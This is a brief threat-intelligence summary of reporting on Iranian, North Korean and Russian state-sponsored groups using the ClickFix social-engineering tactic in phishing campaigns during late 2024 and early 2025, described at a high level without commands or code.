Summary: Various state-sponsored hacking groups from Iran, North Korea, and Russia have adopted the ClickFix social engineering tactic to deploy malware in a series of phishing campaigns from late 2024 into early 2025. This approach has evolved from cybercrime applications to being utilized by nation-state actors, who manipulate targets into executing malicious commands under the guise of technical fixes. Reports indicate this technique enhances existing infection chains without completely redefining them, showcasing its appeal across various state-sponsored threat groups.
Affected: Multiple state-sponsored hacking groups (TA427, TA450, UNK_RemoteRogue, TA422)
Keypoints :
- ClickFix is a method prompting users to self-infect their machines under the pretext of addressing issues.
- TA427’s campaign involved sophisticated phishing tactics, targeting individuals in think tanks by impersonating a Japanese diplomat.
- MuddyWater utilized ClickFix to deploy remote management software to facilitate espionage, targeting sectors like finance and healthcare.
- INK_RemoteRogue employed ClickFix tactics to target major defense manufacturers through manipulated communication, emphasizing the widespread adoption of this technique among threat actors.
- Reports suggest the technique’s ongoing evolution, indicating potential future use by other state-sponsored groups.
Source: https://thehackernews.com/2025/04/state-sponsored-hackers-weaponize.html